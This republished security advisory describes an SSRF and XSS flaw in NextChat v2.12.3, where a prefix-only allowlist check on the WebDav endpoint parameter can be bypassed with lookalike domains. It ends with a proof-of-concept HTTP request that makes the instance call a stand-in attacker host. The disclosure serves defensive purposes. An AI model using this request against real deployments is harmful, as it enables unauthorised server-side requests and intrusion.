NextChat v2.12.3 suffers from a Server-Side Request Forgery (SSRF) and Cross-Site Scripting vulnerability due to a lack of validation of the GET parameter on the WebDav API endpoint.The vulnerability exists because of the following code snippet : // Validate the endpoint to prevent potential SSRF attacks if ( !mergedAllowedWebDavEndpoints.some( (allowedEndpoint) => endpoint?.startsWith(allowedEndpoint), ) )This check seems incomplete because it validates if the URL specified in the endpoint GET parameter starts with the URL declared in the following file :export const internalAllowedWebDavEndpoints = [ "https://dav.jianguoyun.com/dav/", "https://dav.dropdav.com/", "https://dav.box.com/dav", "https://nanao.teracloud.jp/dav/", "https://bora.teracloud.jp/dav/", "https://webdav.4shared.com/", "https://dav.idrivesync.com", "https://webdav.yandex.com", "https://app.koofr.net/dav/Koofr", ];Some allowed URLs do not enforce the trailing slash or a specific folder, allowing an attacker to forge a valid URL which can then pass through the SSRF verification and trigger an arbitrary HTTPS call from the vulnerable instance.Proof Of Concept:In order to reproduce the issue, it is possible to create an attacker-controller hostname like webdav.yandex.com.attacker.tld and perform the following HTTP request : GET /api/webdav/chatgpt-next-web/backup.json?endpoint=https://webdav.yandex.com.attacker.tld/ HTTP/1.1 Host: VULNERABLE_NEXTCHAT_INSTANCE User-Agent: Mozilla Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: close The vulnerable instance will then issue a HTTPS request to https://webdav.yandex.com.attacker.tld.
This Cyber News was published on www.tenable.com. Publication date: Wed, 26 Jun 2024 13:56:11 +0000